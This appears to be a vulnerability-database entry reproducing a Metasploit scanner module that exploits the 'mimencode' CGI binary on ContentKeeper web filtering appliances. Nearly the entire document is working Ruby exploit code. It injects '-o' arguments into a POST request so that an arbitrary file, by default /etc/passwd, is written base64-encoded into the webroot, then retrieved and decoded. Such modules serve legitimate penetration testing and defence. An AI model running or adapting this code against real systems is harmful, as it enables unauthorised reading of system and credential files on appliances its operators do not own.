ContentKeeper Web Appliance mimencode File Access

2011-04-10T15:27:17
ID MSF:AUXILIARY/ADMIN/HTTP/CONTENTKEEPER_FILEACCESS
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24

Description

This module abuses the 'mimencode' binary present within ContentKeeper Web filtering appliances to retrieve arbitrary files outside of the webroot.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'ContentKeeper Web Appliance mimencode File Access',
      'Description' => %q{
        This module abuses the 'mimencode' binary present within
        ContentKeeper Web filtering appliances to retrieve arbitrary
        files outside of the webroot.
        },
      'References'   =>
        [
          [ 'OSVDB', '54551' ],
          [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
        ],
      'Author'      => [ 'aushack' ],
      'License'     => MSF_LICENSE)

    register_options(
      [
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
        OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
      ])
  end

  def run_host(ip)
    begin
      tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traveral data in a hard-to-brute filename, just in case.

      print_status("Attempting to connect to #{rhost}:#{rport}")
      res = send_request_raw(
        {
          'method'  => 'POST',
          'uri'     => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
        }, 25)

      if (res and res.code == 500)

        print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")

        file = send_request_raw(
          {
            'method'  => 'GET',
            'uri'     => '/' + tmpfile,
          }, 25)

        if (file and file.code == 200)
          print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
        elsif (file and file.code)
          print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
        end
      elsif (res and res.code)
        print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE

    end
  end
end